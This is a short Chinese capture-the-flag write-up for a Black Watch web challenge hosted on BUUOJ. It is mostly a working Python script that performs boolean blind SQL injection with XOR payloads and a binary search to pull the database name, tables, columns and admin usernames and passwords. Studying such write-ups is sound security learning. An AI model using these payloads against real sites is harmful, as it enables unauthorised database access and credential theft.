# [Black Watch 入群题] Web

# 1

发现可以 SQL 注入,盲注(json 数据需先解码):

import requests

flag = ''
# 查库名
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'  # 库名为news

# 查表名
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1'  # 表名为admin,contents

# 查字段
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'  # admin表里有id,username,password,is_enable
# contents表里有id,title,content,is_enable

# 查字段值
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'  # 分别查username和password

for i in range(1, 100):
    low = 28
    high = 137
    mid = (low + high) // 2

    while (low < high):
        url = 'http://8925938b-be36-44ef-a411-70363c14ef36.node5.buuoj.cn:81/backend/content_detail.php?id='
        payload = payload4.format(i, mid)
        url += payload
        print(url)
        r = requests.get(url)
        text = str(r.json())

        if "札师傅缺个女朋友" in text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2

    if (chr(mid) == ''):
        break
    flag += chr(mid)
    print(flag)

print(flag)

# 这个代码使用了id=1时的情况,使用了二分法提高了查询的速度

参考链接:https://blog.csdn.net/qq_46263951/article/details/119059485

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal